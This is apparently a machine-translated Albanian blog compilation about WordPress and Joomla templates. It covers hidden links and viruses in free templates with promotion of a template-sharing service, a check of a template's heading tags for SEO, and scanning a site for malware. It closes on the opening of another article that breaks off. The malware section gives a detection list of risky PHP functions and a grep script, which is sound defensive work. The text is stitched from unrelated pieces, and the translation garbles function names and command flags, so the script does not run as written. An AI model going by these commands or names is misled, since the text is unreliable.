Si të mbroheni nga lidhjet dhe viruset e fshehura në shabllonet për Joomla dhe WordPress? Si të ndryshoni një shabllon WordPress që t'i përshtatet vetes: kontrollimi i paraqitjes së shabllonit sipas rregullave të SEO-së Kontrolloni temën e WordPress.

Përshëndetje, të dashur lexues të faqes së blogut. Në ditët e sotme ka pak webmasterë që dizajnojnë vetë faqen e tyre të internetit (duke përdorur Html të pastër, motorin e tyre, ose të paktën duke përdorur shabllone të krijuar vetë për CMS). Në përgjithësi, kjo është e vërtetë, sepse jo të gjithë janë në gjendje të krijojnë diçka të vlefshme - kjo kërkon talentin e një stilisti. Më shpesh rezulton të jetë të paktën "jo shumë mirë", dhe ndonjëherë "thjesht e tmerrshme".

Kjo është arsyeja pse shabllonet ose temat e dizajnit (në motorë të ndryshëm, "lëkurat" mund të referohen me terma të ndryshëm) për CMS të njohura janë bërë kaq të përhapura. Sidomos shumë nga këto të mira mund të gjenden në internet për Joomla dhe WordPress, sepse kjo është me të drejtë, si në RuNet ashtu edhe në internetin borgjez.

Në fakt, tashmë ka mjaft burime në gjuhën ruse me katalogë të shablloneve të gatshëm. Epo, në borgjezi nuk ka asnjë mënyrë për t'i numëruar ato. Gjithçka duket kaq e mrekullueshme - instaloni motorin, gjeni një shabllon të përshtatshëm (nuk është sekret që shabllonet me pagesë nuk janë aq të vështira për t'u gjetur falas), shkarkoni atë dhe shijoni dizajnin profesional të faqes tuaj të re të internetit. Mbetet vetëm të shtoni përmbajtje të vlefshme në të dhe do të jeni në gjendje të shikoni popullaritetin e burimit tuaj të rritet në internet.

Por jo gjithçka është kaq e thjeshtë dhe e qartë. Kur kam shkruar një artikull shumë kohë më parë, kam marrë mjaft rregullisht rekomandime nga lexuesit me postë për të hequr këtë apo atë shërbim nga lista, sepse në ato të postuara atje Lidhjet e fshehura apo edhe viruset gjenden në shabllone. Rezulton se proverbi është i vërtetë - djathi falas mund të gjendet vetëm në një kurth miu. Zhvilluesit e modeleve falas (ose ata që "zero" ato me pagesë) thjesht fitojnë para në këtë mënyrë dhe, duke gjykuar nga shtrirja, shumë prej tyre.

Lidhjet e fshehura me burimet e palëve të treta (dhe shpesh të futura në listën e zezë nga motorët e kërkimit), dhe aq më tepër viruset, mund të vrasin të gjitha shpresat për të promovuar burimin tuaj (ose t'i minojnë seriozisht ato dhe t'ju prishin nervat). Për këtë mundeni ose. Si mund të mbroheni nga e gjithë kjo kur zgjidhni një shabllon?

Çfarë nuk shkon me shabllonet falas për Joomla dhe WordPress?

Nga përvoja ime mund të them se është shumë e vështirë për një "amator" të konkurrojë me një "profesionist". Në fillim të këtij botimi, unë ofrova një lidhje me një artikull në lidhje me viruset që infektuan shumicën e faqeve të mia. Kjo ndodhi më shumë se dy vjet më parë, dhe gjatë kësaj kohe unë kam përsëritur luftën epike për "pastërtinë e kodit" më shumë se një herë, por përsëritjet përsëri ndodhin me rregullsi të lakmueshme në një numër burimesh të infektuara (ose dërgohet spam prej tyre, ose një dera është formuar, atëherë diçka krejtësisht e pakuptueshme për mua po ndodh, duke çuar në një ngarkesë monstruoze të madhe në pritje).

Në të njëjtën kohë, unë përdor të gjitha metodat e disponueshme për një "noob" për të kërkuar predha dhe dyer të tjera të pasme në kodin e këtyre faqeve, por përsëri, përsëris se një amator thjesht nuk mund të konkurrojë me një profesionist. Prandaj, nëse mendoni se mund të hiqni lehtësisht një virus që ka depërtuar në një shabllon, atëherë ka shumë të ngjarë që gaboheni. Kjo është një çështje shumë e zymtë, tmerrësisht e bezdisshme (kur aktiviteti viral, pavarësisht nga të gjitha përpjekjet tuaja, shfaqet përsëri dhe përsëri) dhe kërkon shumë kohë dhe përpjekje.

E njëjta vlen edhe për lidhjet e fshehura. Është mirë nëse hasni në një opsion për t'i prezantuar ato nga një epokë e kaluar, kur thjesht mund të gjeni vendin për t'i futur dhe për t'i hequr qafe përgjithmonë, duke marrë në fund një shabllon të pastër dhe falas. Në shumicën e rasteve, gjithçka është shumë më e ndërlikuar. Për të gjetur se ku mund të futni lidhje të fshehura, do t'ju duhet softuer (për shembull, shtojca TAC), por nuk është i gjithëfuqishëm, sepse biznesi i shpërndarjes së lidhjeve përmes shablloneve falas dhe të paguar (të hakuar) për Joomla dhe WordPress sjell të ardhura shumë të mira. gjë që inkurajon njerëzit që e praktikojnë të kërkojnë zgjidhje të reja që e bëjnë "shënuesin" e tyre më pak të dukshëm.

Në fakt, sot mund të jetë mjaft e vështirë të kontrollosh shpejt një shabllon për gjenerimin e "lidhjeve të majta". Për shembull, keni shkarkuar një shabllon, e keni vendosur në sajt, keni shtuar përmbajtje dhe keni vendosur të shihni nëse ndonjë lidhje e jashtme e dyshimtë (jo e vendosur nga ju) është shfaqur prej tij. Nuk ka asnjë prej tyre. Ju jeni të lumtur, harroni këtë problem, jeni të zënë me plotësimin e faqes dhe promovimin e tij, dhe më pas papritur zbuloni aksidentalisht (vetëm ose pas një sinjali nga motorët e kërkimit në formën e një filtri ose ndalimi) se ka ende lidhje të fshehura dhe ato çojnë në një "llull" të tillë, të cilës ju vetë nuk do ta mendonit kurrë t'i referoheni.

Gjëja më fyese për këtë është se për të hequr filtrin dhe për të “zbardhur” faqen në sytë e motorëve të kërkimit Mund të zgjasë shumë kohë (në disa raste me muaj dhe madje edhe vite). Por çështja këtu është se zhvilluesit e "faqeshënuesve" të tillë janë të vetëdijshëm që ju dini rreth tyre dhe kontrollojnë faqen pas instalimit të shabllonit për "të gjitha llojet e teprimeve të këqija". Prandaj, ata ngadalësojnë fillimin e gjenerimit të këtyre lidhjeve për ca kohë, të mjaftueshme për mendimin e tyre që edhe përdoruesi më i dyshimtë të besojë në pastërtinë e shabllonit që ka marrë falas.

Për më tepër, lidhjet e fshehura tani janë të koduara në atë mënyrë që të mos kërkohen duke përdorur fjalët md5 ose base64 (shpesh ato ngarkohen nga një burim i jashtëm). Vetëm një grup shkronjash dhe karakteresh speciale që nuk mund të gjenden duke kërkuar nëpër të gjithë skedarët e shablloneve. Dhe mund të ketë më shumë se njëqind prej këtyre skedarëve. Plus, lidhjet nuk shfaqen menjëherë. Kjo është, në fakt, është e pamundur që një webmaster (mesatarja) t'i zbulojë ato në fazën e krijimit të një faqe interneti.

Epo, për të shmangur infeksionin përmes shabllonit, unë Unë preferoj të paguaj para për të mos u përballur me një mori problemesh më vonë. Një tjetër gjë është se ju mund të paguani shumë para, ose mund të paguani jo shumë. Unë personalisht zgjedh opsionin e dytë, por së pari do të shpjegoj thelbin e të parës.

Diçka, sigurisht, mund të gjendet dhe në depot zyrtare të këtyre motorëve(lexoni për këtë dhe shkoni në faqen zyrtare të shtesave për Joomla), por, së pari, zgjedhja atje është dukshëm e kufizuar, dhe së dyti, mijëra faqe të tjera në mbarë botën do të vishen me të njëjtat "rroba", gjë që redukton disi unike e projektit tuaj si në sytë e vizitorëve ashtu edhe në sytë e motorëve të kërkimit.

Megjithatë, ka shumë kompani profesionale në botë që zhvillojnë shabllone me pagesë për Joomla dhe WordPress. A priori (), ata nuk duhet të kenë faqerojtës, përndryshe ata do të humbasin menjëherë autoritetin dhe besimin e klientëve. Sidoqoftë, çmimi për një shabllon mund të jetë 50-100 dollarë, në varësi të funksionalitetit dhe risisë së tij.

Për më tepër, mund të shfaqen disa probleme me pagesën (do të duhet të rrezikoni dhe të bëni një blerje me pagesë direkt nga një kartë plastike). Sidoqoftë, si rezultat do të merrni një shabllon qëllimisht "të pastër", gjë që është e mirë. Vërtetë, mbështetja teknike që vjen me të do të jetë e rëndësishme vetëm nëse e dini gjuhën në të cilën ofrohet. Në shumicën e rasteve, njohja e gjuhës ruse nuk do t'ju ndihmojë në këtë çështje.

Më pëlqen më mirë opsioni i dytë për shkak të përfitimit të tij më të lartë (raporti i parave të shpenzuara ndaj mundësive të marra), megjithëse në lidhje me zhvilluesit nuk është plotësisht "i bardhë". Thelbi i saj është se Joomla dhe WordPress shpërndarë nën një licencë GNU/GPL, d.m.th. licencat për softuer të lirë (software i tillë mund të përdoret, kopjohet, modifikohet dhe shpërndahet). Në fakt, unë kam shkruar tashmë për këtë më parë në artikullin rreth modeleve të Joomla të përmendura në fillim.

Pa u futur në shumë detaje, çështja është se shtesat (shabllonet, shtojcat, etj.) për këta motorë nuk mund të jenë pronë private e autorëve. Po, ju mund të kërkoni pagesë për to, por nuk do të jetë më e mundur të ndëshkoni ose ndiqen penalisht për përdorim ose shpërndarje të paautorizuar të këtyre shtesave. Pavarësisht kësaj, tregu për shtesat me pagesë për Joomla dhe WordPress është i madh, megjithëse nuk mbrohen nga ligji për të drejtën e autorit. Përkundrazi, licenca GNU/GPL ju mbron 100% nga zhvilluesi.

Shumë kompani zhvillimi, nga rruga, ofrojnë akses në shabllonet e tyre me pajtim. Ato. ju paguani një shumë të caktuar dhe për një kohë të caktuar mund të shkarkoni dhe të vazhdoni të përdorni të gjitha krijimet e tyre (shabllonet ose shtesat) në mënyrë të vazhdueshme. Në fakt, mënyra e dytë për të marrë me siguri tema për WordPress, si dhe shabllone për Joomla, bazohet afërsisht në të njëjtin parim.

Jo shumë kohë më parë, miku im, të cilin e përmenda në një sërë artikujsh, "i drejtoi gishtin" (ai ka disa vite që kërkon opsionin ideal për ndërtimin e një dyqani online dhe përgjatë kësaj rruge gjen shumë gjëra që më duken interesante dhe përdoren në mënyrë aktive në të ardhmen). Ne po flasim për bashkimin e modeleve dhe shtesave premium CmsHeaven.org .

Thelbi i mbledhjes së fondeve është mjaft i thjeshtë - blini një produkt dhe shpërndajeni atë për të gjithë ata që morën pjesë në mbledhjen e fondeve. CmsHeaven.org e ka thjeshtuar edhe më shumë skemën - nuk ka nevojë të shpenzoni për shabllone ose shtesa individuale që ju nevojiten. Ju thjesht paguani për akses të përkohshëm në të gjithë katalogun që ka në dispozicion ky shërbim (disa mijëra tituj, të ndarë për lehtësi kërkimi sipas motorëve, autorëve dhe temave).

Secili prej produkteve të paraqitura është blerë me ndershmëri nga zhvilluesit me paratë e depozituesve (ka edhe shabllone falas, por përsëri ato janë paraqitur nga marka të njohura që u duhen për qëllime reklamimi). Dhe ajo që është e rëndësishme, organizatorët po e përditësojnë vazhdimisht katalogun me kopje të reja (në vapën e momentit, siç thonë ata), të cilat do të duhet të presin për një kohë të gjatë në publik. Shumë njerëz do ta pëlqejnë këtë.

Në përgjithësi, kjo është një kooperativë ku mund të bashkoheni dhe të shijoni të gjitha përfitimet. Por me disa kufizime. Fakti është se organizatorët e dinë mirë se pa futur kufizime, i gjithë katalogu i tyre do të rrjedhë në publik në një çështje kohe. Prandaj ndodh kufiri në 36 shkarkime në muaj. Kjo është mjaft e mjaftueshme për një webmaster të zakonshëm, madje edhe për një kompani të krijimit të faqeve në internet.

Kjo garanton mungesa në shtesat dhe shabllonet e paraqitura "faqeshënuesit"(lidhje të fshehura, viruse, trojanë dhe grabitqarë që informojnë zhvilluesin për sitin duke përdorur shabllonin e tyre). Në funksion të kësaj, blihen vetëm produkte të markave të njohura me kod të hapur, ku e gjithë kjo mund të kontrollohet dhe, nëse është e nevojshme, të eliminohet.

Disa nga shtesat janë përkthyer në rusisht dhe nëse lindin probleme me instalimin ose konfigurimin, gjë që shpesh është shumë e nevojshme (me siguri e keni krehur internetin më shumë se një herë në kërkim të një zgjidhjeje për një problem që u ngrit papritmas) . Nga rruga, kjo është ajo që i dallon motorët falas nga ata me pagesë, se nuk ka mbështetje për përdoruesit si të tillë.

Dhe do të mund të shkarkoni produktet që ju pëlqejnë me shpejtësi normale dhe pa parë reklama në shërbimet e pritjes së skedarëve. Është një gjë e vogël, sepse për të marrë "simpatin" e lakmuar, mund të lëvizësh malet, dhe jo vetëm të luftosh me një shërbim të mbajtjes së skedarëve, por janë vogëlsitë ato që përbëjnë rehati.

Në përgjithësi, më pëlqeu shumë ideja dhe zbatimi i saj, por a duhet të përdor shabllone falas nga depot e Joomla dhe WordPress, a duhet të bashkohem në CmsHeaven.org apo të blej shabllone direkt nga zhvilluesit? ju duhet të vendosni vetë. Thjesht "Ju lutem, mos hani domate të gjalla gjatë natës", domethënë, mos shkarkoni produkte falas nga ndonjë burim "i mrekullueshëm", sepse mund të përfundoni me shumë probleme. Keni nevojë për të?

Paç fat! Shihemi së shpejti në faqet e faqes së blogut

Ju mund të jeni të interesuar

Si të futni kodin numërues të vizitave në një sajt që ekzekuton Joomla duke përdorur modulin e kodit HTML të personalizuar ose direkt në një shabllon
Si të krijoni vetë një faqe interneti profesionale për kartëvizitë pa njohuri për Html, CSS dhe PHP? Përgjigje: MotoCMS!
Si të merrni një shabllon përshtatës për një faqe interneti të ardhshme, dhe bashkë me të një CMS intuitive dhe të shpejtë për t'u nisur
10 gabime vdekjeprurëse gjatë shkrimit dhe publikimit të artikujve
Krijimi i një artikulli menyje në Joomla për të hyrë në forum dhe transferimi i regjistrimit të përdoruesit nga SMF në sajt
Vendosja e JFusion për të kombinuar forumin SMF dhe sajtin Joomla
Modulet JFusion për shfaqjen e mesazheve nga forumi në faqen e internetit, si dhe krijimin e një butoni në SMF për t'u kthyer në Joomla WebPoint PRO është një temë e përgjegjshme e WordPress me funksionalitet të gjerë dhe optimizim teknik kompetent të motorit të kërkimit
Share42 - një skript për shtimin e butonave të rrjeteve sociale dhe faqeshënuesve në sit (ekziston një opsion i panelit lundrues)
Instalimi i Forumit SMF - Integrimi i Forumit Joomla 1.5 dhe Simple Machines duke përdorur komponentin JFusion

Pasi të keni zgjedhur një shabllon për ta instaluar në faqen tuaj të WordPress, ia vlen të kontrolloni paraqitjen e tij për pajtueshmërinë me rregullat bazë të SEO (optimizimit). Për shembull, shablloni me kuti "Twenty Fourteen" është krijuar në mënyrë që titujt e miniaplikacioneve të shfaqen në etiketa

, e cila mund të ndikojë negativisht në promovimin e faqes. Ka mangësi të tjera në paraqitjen e shablloneve që duhet të eliminohen përpara se të mbushni faqen me materiale dhe ta hapni atë për motorët e kërkimit.

Është jashtëzakonisht e vështirë të gjesh një shabllon të gatshëm të WordPress që plotëson plotësisht nevojat tuaja. Shumë shpesh, ju pëlqen shablloni i zgjedhur, por nuk jeni të kënaqur me skemën e tij të ngjyrave ose nuk ju pëlqen vendndodhja e shiritit anësor, kokës, fontit, etj. Platforma WP ka të gjitha mundësitë për të ndryshuar shabllonin e WordPress për t'iu përshtatur nevojave tuaja.

Për shembull, le të modifikojmë një shabllon WordPress të quajtur "Twenty Fourteen". Ky shabllon do të shërbejë si një shembull praktik mbi të cilin mund të shihni të gjitha nuancat e rregullimit të imët dhe jo vetëm të rregullimit të modeleve të WordPress.

Përgatitja për të redaktuar shabllonin

Përpara çdo pune me kodin WordPress, duke përfshirë ndryshimin e shabllonit të punës, duhet të bëni dhe të keni në dorë:

  • (katalog dhe bazë të dhënash);
  • Një kopje rezervë e shabllonit të punës (të redaktueshme).

Shablloni duhet të konfigurohet më parë në skedën Paraqitje→ Personalizo.

Shënim: Për të bërë ndryshime të përhershme në shabllon, duhet të shkoni te . Ekzekutimi në një temë fëmijësh të WordPress ju lejon të përditësoni shabllonin pa humbur ndryshimet tuaja.

Si të personalizoni vetë shabllonin e WordPress "Twenty Fourteen".

Do të përpiqem të tregoj parimin e ndryshimit të një shablloni, i cili do t'ju lejojë të bëni ndryshimet tuaja në çdo shabllon të WordPress.

Pra, detyra: Ekziston një shabllon "Twenty Fourteen" foto 1, ne bëjmë ndryshime me porosi në shabllon dhe në të njëjtën kohë kontrollojmë paraqitjen e shabllonit për të siguruar përputhjen me rregullat e optimizimit të SEO.

Shënim: Vërej se autorët e shumë shablloneve krijojnë cilësime të rikonfigurueshme për shabllonin e tyre, duke shfaqur ndërfaqen e cilësimeve në një skedë të veçantë. Kur punoni me shabllone të tillë, mund të vendosni lehtësisht cilësimet e personalizuara të shabllonit pa ndryshuar kodin e shabllonit. Ky nuk është një opsion i përshkruar në këtë artikull.

Kontrollimi i paraqitjes së shabllonit për rregullat e SEO

Le të shohim së pari paraqitjen e shabllonit. Para se të kontrolloni, vendosni cilësimet e shabllonit të dhënë.

Për të kontrolluar paraqitjen për pajtueshmërinë me rregullat e SEO, do të na duhet:

  • Vendosni çdo miniaplikacion në shiritin(t) anësor të shabllonit. Le të jetë një kalendar. Ne patjetër do t'i japim një emër miniaplikacionit.
  • Krijoni një faqe testimi dhe një postim në faqen e testimit.

Hapat për të kontrolluar paraqitjen e shabllonit për rregullat e SEO

Hapi 1: Kontrollimi i faqes kryesore

1. Hapni faqen kryesore të faqes. Çdo shfletues ka mjete zhvilluesish. Ne gjejmë menaxhim të thjeshtë të mjeteve në butonin e djathtë të miut, për shfletuesin Chrom "Shiko kodin". 2. Në faqen kryesore të faqes (faqja e postimeve të fundit), shikoni kodin në kokën e faqes. Nëse ky është tekst, atëherë duhet të jetë në etiketat h1. Nëse ky është një imazh, atëherë NUK duhet të jetë në etiketat h1.

E rëndësishme! Nuk duhet të ketë më shumë se dy etiketa h1 në çdo faqe të faqes. Një hapëse

, mbyllja e dytë

.

3. Për të mos “shpirë” të gjithë titujt në faqe, shikoni “Kodin e faqes” në butonin e djathtë të miut dhe, duke hapur kërkimin e faqes (butonat ctrl+F), kërkoni “h1”. Nëse kërkimi gjen më shumë se dy etiketa h1, ne shikojmë atë që ato krijojnë dhe përpiqemi ta rregullojmë atë. Rregullimi është vetëm më poshtë.
kontrollimi i paraqitjes së shabllonit 4. Njoftimet e artikujve, në shembullin tonë ky është një artikull provë. Titulli i shpalljes duhet të jetë në etiketat h2. Nëse titujt e shpalljeve të artikujve në etiketat h1 ose h3 duhet të korrigjohen. Rregullimi është vetëm më poshtë. 5. Të gjithë titujt e miniaplikacioneve duhet të jenë në etiketat h3 ose h4. Kjo faqe është vendosur në mënyrë që titujt e miniaplikacioneve të mbështillen me etiketa

, kjo duhet rregulluar. Rregullimi është vetëm më poshtë.

E përsëris! Nuk duhet të ketë më shumë se dy etiketa h1 në çdo faqe të faqes. Një hapëse

, mbyllja e dytë

.

Hapi 2. Testimi i faqes së postimit të testit

Pas faqes kryesore të faqes, ne hapim postimin e testimit të faqes. Këtu kontrollojmë që vetëm titulli i postimit të jetë i mbështjellë me etiketat h1. Ne e bëjmë kontrollin në të njëjtën mënyrë si postimi i faqes. Vetëm titulli i faqes duhet të mbështillet me etiketat h1.

Hapi 3: Kontrollimi i miniaplikacioneve

Në mënyrë të ngjashme, shikoni etiketat e titullit të miniaplikacioneve në shiritin anësor dhe në fund.


kontrollimi i paraqitjes së shabllonit të miniaplikacionit

Rezultatet e kontrollit të paraqitjes

Si rezultat, duke kontrolluar paraqitjen e shabllonit në këtë shabllon, zbuluam se titujt e miniaplikacionit në fundin dhe shiritin anësor të faqes janë të mbështjellë me etiketat h1. Kjo duhet të rregullohet.

1. Për ta rregulluar atë, shkoni te drejtoria e shabllonit dhe hapni skedarin funksione.php për redaktim. Me fjalët "shkoni te drejtoria e shabllonit" nënkuptojmë kopjimin e skedarit të dëshiruar (mundeni nga redaktori i konsolës) dhe redaktimi i tij në një redaktues teksti si Notepad++. 2. Në skedarin functions.php, kërkoni se si specifikohet prodhimi i miniaplikacioneve në shabllon. Për këtë shabllon, shohim që titujt e miniaplikacioneve janë në etiketat h1. Ndrysho h1 në h3. 3. Nëse lloji i kokës së miniaplikacionit nuk është vendosur në skedarin functions.php, shkoni te skedari footer.php dhe shikoni se si titulli i miniaplikacionit në fund të faqes është i mbështjellë në këtë skedar. Ndrysho h1 në h3.

Nëse zbulojmë se në faqen kryesore njoftimet e artikujve shfaqen në etiketat h1, domethënë në faqen e postimeve të fundit, ka disa tituj në h1, ne lexojmë artikullin dhe eliminojmë këtë gabim të paraqitjes së SEO.

Tema e artikullit doli të ishte më e madhe nga sa prisja, kështu që do të më duhet të ndryshoj shabllonin e WordPress për t'iu përshtatur vetes, domethënë, të ndryshoj pamjen e tij, do ta bëjmë këtë në artikullin tjetër. Së pari, mund të lexoni artikujt: Rregullat e paraqitjes për një skedar të stilit kaskadë të WordPress.

WordPress është motori më i popullarizuar për krijimin e faqeve dhe blogjeve të ndryshme informacioni. Siguria e faqes suaj të internetit është më shumë se siguria e të dhënave tuaja. Kjo është shumë më e rëndësishme, sepse është gjithashtu siguria e të gjithë përdoruesve që lexojnë dhe besojnë burimin tuaj. Kjo është arsyeja pse është kaq e rëndësishme që faqja të mos jetë e infektuar me viruse ose ndonjë kod tjetër me qëllim të keq.

Ne do të shikojmë se si të mbroni WordPress nga hakerimi në një nga artikujt e mëposhtëm, por tani dua t'ju tregoj se si të kontrolloni një faqe interneti WordPress për viruse dhe kode me qëllim të keq për t'u siguruar që gjithçka është e sigurt.

Opsioni i parë që ju vjen në mendje është që ju jeni hakeruar nga hakerat dhe keni ndërtuar prapaskenat e tyre në kodin e faqes tuaj në mënyrë që të jeni në gjendje të dërgoni spam, të vendosni lidhje dhe gjëra të tjera të këqija. Kjo ndodh ndonjëherë, por ky është një rast mjaft i rrallë nëse përditësoni softuerin në kohë.

Ka mijëra tema falas të WordPress dhe shtojca të ndryshme, dhe kjo tashmë mund të jetë një kërcënim. Është një gjë kur shkarkoni një shabllon nga faqja e WordPress dhe krejt tjetër kur e gjeni në faqen e majtë. Zhvilluesit e paskrupullt mund të futin kode të ndryshme me qëllim të keq në produktet e tyre. Rreziku është edhe më i madh nëse shkarkoni shabllone premium falas, ku hakerët, pa rrezikuar asgjë, mund të shtojnë një lloj vrime sigurie përmes së cilës më pas mund të depërtojnë dhe të bëjnë atë që u nevojitet. Kjo është arsyeja pse kontrollimi i një faqeje WordPress për viruse është kaq i rëndësishëm.

Kontrollimi i një faqeje WordPress për viruse

Gjëja e parë që duhet t'i drejtoheni kur kontrolloni një faqe nuk janë viruset, këto janë shtojcat e WordPress. Shpejt dhe lehtë, ju mund të skanoni faqen tuaj dhe të gjeni zona të dyshimta të kodit që ia vlen t'u kushtoni vëmendje, qofshin ato në temë, shtojcë ose në thelbin e vetë Wodpress. Le të shohim disa nga shtojcat më të njohura:

1.TOC

Kjo shtojcë shumë e thjeshtë kontrollon të gjitha temat e instaluara në faqen tuaj për të parë nëse ato përmbajnë kod me qëllim të keq. Shtojca zbulon lidhje të fshehura të koduara duke përdorur futjen e kodit base64, dhe gjithashtu shfaq informacion të detajuar në lidhje me problemet e gjetura. Më shpesh, pjesët e gjetura të kodit nuk janë viruse, por ato mund të jenë potencialisht të rrezikshme, kështu që duhet t'u kushtoni vëmendje atyre.

Hapur "Pamja" -> "TAC" pastaj prisni derisa të kontrollohen të gjitha temat.

2. Skaner VIP

Shumë i ngjashëm me skanerin e temave TOC, por shfaq informacion më të detajuar. Të njëjtat aftësi për zbulimin e lidhjeve, kodit të fshehur dhe inserteve të tjera me qëllim të keq. Thjesht hapni artikullin Skaneri VIP në seksionin e veglave dhe analizoni rezultatin.

Mund të jetë e mjaftueshme për të fshirë skedarët e panevojshëm, për shembull, desktop.ini. Ose duhet të shikoni më në detaje se çfarë ndodh në skedarët duke përdorur base64.

3. Anti-Malware nga GOTMLS.NET

Ky plugin ju lejon jo vetëm të skanoni temat dhe thelbin e faqes për viruse, por edhe të mbroni faqen nga fjalëkalimet e forcës brutale dhe sulmet e ndryshme XSS, SQLInj. Kërkimi kryhet në bazë të nënshkrimeve dhe dobësive të njohura. Disa dobësi mund të rregullohen në vend. Për të filluar skanimin e skedarëve, hapeni "Anti-Malvare" në menynë anësore dhe klikoni "Ekzekuto skanimin":

Përpara se të kryeni një skanim, duhet të përditësoni bazat e të dhënave tuaja të nënshkrimit.

4. Fjalimi

Ky është një nga shtojcat më të njohura për sigurinë e WordPress dhe skanimin e malware. Përveç skanerit, i cili mund të gjejë shumicën e faqeshënuesve në kodin WordPress, ekziston mbrojtje e vazhdueshme kundër llojeve të ndryshme të sulmeve dhe forcës brutale të fjalëkalimit. Gjatë kërkimit, shtojca gjen probleme të mundshme me shtojca dhe tema të ndryshme dhe raporton nevojën për të përditësuar WordPress.

Hapni skedën "WPDefence" në menynë anësore dhe më pas shkoni te skeda "Skano" dhe shtypni "Fillimi i skanimit":

Skanimi mund të marrë pak kohë, por kur të përfundojë, do të shihni një raport të detajuar të problemeve të gjetura.

5. Antivirus

Ky është një tjetër shtojcë e thjeshtë që do të skanojë shabllonin e faqes suaj të internetit për kod me qëllim të keq. Disavantazhi është se vetëm shablloni aktual skanohet, por informacioni shfaqet me detaje të mjaftueshme. Do të shihni të gjitha funksionet e rrezikshme që janë në temë dhe më pas mund të analizoni në detaje nëse ato paraqesin ndonjë rrezik. Gjeni një artikull "Antivirus" në cilësimet dhe më pas klikoni "Skanoni modelet e temave tani":

6. Kontrolluesi i integritetit

Këshillohet gjithashtu të kontrolloni integritetin e skedarëve të WordPress, në rast se virusi tashmë është shkruar diku. Për këtë mund të përdorni shtojcën Integrity Checker. Ai kontrollon të gjitha skedarët bazë, shtojcat dhe shabllonet për ndryshime. Në fund të skanimit, do të shihni informacione për skedarët e ndryshuar.

Shërbimet online

Ekzistojnë gjithashtu disa shërbime në internet që ju lejojnë të kontrolloni një faqe WordPress për viruse ose të kontrolloni vetëm shabllonin. Ja disa prej tyre:

themecheck.org- ju shkarkoni arkivin e temave dhe mund të shihni të gjitha paralajmërimet në lidhje me funksionet e mundshme me qëllim të keq që përdoren në të. Ju nuk mund të shikoni vetëm informacione për temën tuaj, por edhe për tema të tjera të ngarkuara nga përdorues të tjerë, si dhe versione të ndryshme të temës. Çfarëdo që të gjejnë shtojcat mund të gjenden nga kjo faqe. Kontrollimi i temës suaj të WordPress është gjithashtu shumë i rëndësishëm.

virustotal.com- një burim i njohur ku mund të kontrolloni faqen tuaj të internetit ose skedarin e shabllonit për viruse.

ReScan.pro- skanimi i një faqeje WordPress për viruse duke përdorur këtë shërbim është falas; kryhet analiza statike dhe dinamike për të zbuluar ridrejtimet e mundshme; skaneri hap faqet e faqes. Kontrollon faqen kundrejt listave të zeza të ndryshme.

sitecheck.sucuri.net- një shërbim i thjeshtë për skanimin e faqeve dhe temave për viruse. Ekziston një shtojcë për WordPress. Zbulon lidhjet dhe skriptet e rrezikshme.

Kontroll manual

Asgjë nuk mund të jetë më e mirë se kontrolli manual. Linux ka këtë mjet të mrekullueshëm grep që ju lejon të kërkoni për shfaqje të vargjeve arbitrare në një dosje me skedarë. Mbetet për të kuptuar se çfarë do të kërkojmë:

eval - ky funksion ju lejon të ekzekutoni kodin arbitrar PHP, ai nuk përdoret nga produkte që respektojnë veten; nëse një nga shtojcat ose një temë përdor këtë funksion, ka pothuajse një probabilitet 100% që ai të përmbajë një virus;

  • base64_decode- Funksionet e enkriptimit mund të përdoren së bashku me eval për të fshehur kodin keqdashës, por ato mund të përdoren edhe për qëllime paqësore, prandaj kini kujdes;
  • sha1- një metodë tjetër e kriptimit të kodit me qëllim të keq;
  • gzinflate- funksioni i kompresimit, qëllime të njëjta, së bashku me eval, për shembull, gzinflate(base64_decode(code);
  • strrev- e kthen linjën mbrapa jo më parë, pasi një opsion mund të përdoret për kriptim primitiv;
  • shtypur- nxjerr informacion në shfletues, së bashku me gzinflate ose base64_decode është i rrezikshëm;
  • file_put_përmbajtja- Vetë WordPress ose shtojcat ende mund të krijojnë skedarë në sistemin e skedarëve, por nëse tema e bën këtë, atëherë duhet të jeni të kujdesshëm dhe të kontrolloni pse e bën këtë, pasi viruset mund të instalohen;
  • file_get_contents- në shumicën e rasteve përdoret për qëllime paqësore, por mund të përdoret për të shkarkuar kode me qëllim të keq ose për të lexuar informacione nga skedarët;
  • kaçurrela- e njëjta histori;
  • fopen- hap një skedar për të shkruar, nuk e di se për çfarë qëllimi;
  • sistemi- funksioni ekzekuton një komandë në një sistem Linux, nëse një temë, plugin ose wordpress vetë e bën këtë, ka shumë të ngjarë që atje të ketë një virus;
  • lidhje simbolike- krijon lidhje simbolike në sistem, ndoshta virusi po përpiqet ta bëjë sistemin kryesor të skedarëve të aksesueshëm nga jashtë;
  • kopje- kopjon një skedar nga një vend në tjetrin;
  • getcwd- kthen emrin e drejtorisë aktuale të punës;
  • cwd- ndryshon dosjen aktuale të punës;
  • ini_get- merr informacion rreth cilësimeve të PHP-së, shpesh për qëllime paqësore, por nuk i dihet kurrë;
  • raportimi i gabimit (0)- çaktivizon daljen e çdo mesazhi gabimi;
  • dritare.lart.lokacioni.href- funksioni javascript i përdorur për ridrejtime në faqe të tjera;
  • hakuar- kështu që, për çdo rast, kontrollojmë, befas, vendosi të na tregojë vetë hakeri.

Ju mund të zëvendësoni çdo fjalë individuale në një komandë si kjo:

grep -R "hacked" /var/www/path/to/files/wordpress/wp-content/

Ose përdorni një skenar të thjeshtë që do të kërkojë të gjitha fjalët menjëherë:

values="base64_dekode(
eval(base64_decode
gzinflate(base64_decode(
getcwd();
strrev(
chr(ord(
cwd
ini_get
dritare.lart.lokacioni.href
kopjoni (
vlerësoj(
sistem(
lidhje simbolike (
raportimi i gabimit (0)
shtypur
file_get_contents(
file_put_contents(
fopen (
i hakuar"

cd /var/www/path/to/files/wordpress/wp-content/
$ fgrep -nr --përfshi \*.php "$values" *

Përshëndetje miq. A jeni i sigurt se shablloni falas i WordPress që përdorni për faqet e internetit dhe bloget tuaja është vërtet i sigurt dhe nuk përmban kërcënime të fshehura ose kode me qëllim të keq? Jeni plotësisht i sigurt për këtë? Absolutisht?)

Ju mendoni se e keni përdorur shabllonin, keni hequr lidhjet e fshehura prej tij dhe puna ka mbaruar. Ju skanoni periodikisht skedarët e faqes me një antivirus, shikoni mjetet e webmasterit Yandex në skedën e Sigurisë dhe jeni të lehtësuar kur shihni mesazhin atje: " Asnjë kod keqdashës nuk u zbulua në sit«.

Kështu mendova edhe unë. Nuk do te doja te te merzisja, por...

Kodi i fshehur i rrezikshëm në shabllonet falas të WordPress

